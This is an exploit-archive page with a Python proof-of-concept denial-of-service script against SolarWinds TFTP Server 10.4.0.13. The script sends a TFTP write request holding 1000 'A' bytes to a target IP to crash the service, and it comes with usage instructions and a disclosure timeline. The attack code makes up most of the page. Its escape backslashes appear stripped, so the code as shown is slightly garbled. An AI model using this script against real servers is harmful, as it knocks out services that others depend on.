[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Solarwinds 10.4.0.13 Denial of Service Exploit
# Published : 2010-06-12
# Author : Nullthreat
# Previous Title : SumatraPDF v1.1 Denial of Service PoC
# Next Title : Media Player Classic V1.3.1774.0 (mpcpl) 0day suffer from local DoS (PoC)
#!/usr/bin/python
print "n############################################################"
print "## Nullthreat Network"
print "## Solarwinds TFTP Server Ver. 10.4.0.13"
print "## Elliott "Nullthreat" Cutright"
print "## nullthreat@nullthreat.net"
print "############################################################"
print "n"
# Summary: An long Write Request (1000 A's) will cause SolarWinds TFTP Server to crash.
# Tested on: Windows XP SP3
# Usage: ./solarwindscrash.py <IPADDRESS>
# Note: It can take the application a few moments to crash, be patiant.
# Shouts: #SEUnited, Corelan Team
# Discovered: June 6th 2010
# Vendor Notified: June 9th 2010
# Patch Released: June 11th 2010
import socket
import sys
host = sys.argv[1]
port = 69
addr = (host,port)
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
print "[*] Building Crash"
crash = "x41" * 1000
request = "x00x02" + crash + "x00" + "NETASCII" + "x00"
print "[*] Sending Crash"
s.sendto(request, addr)
print "[*] Crash Sent, It can take some time for the app to crash"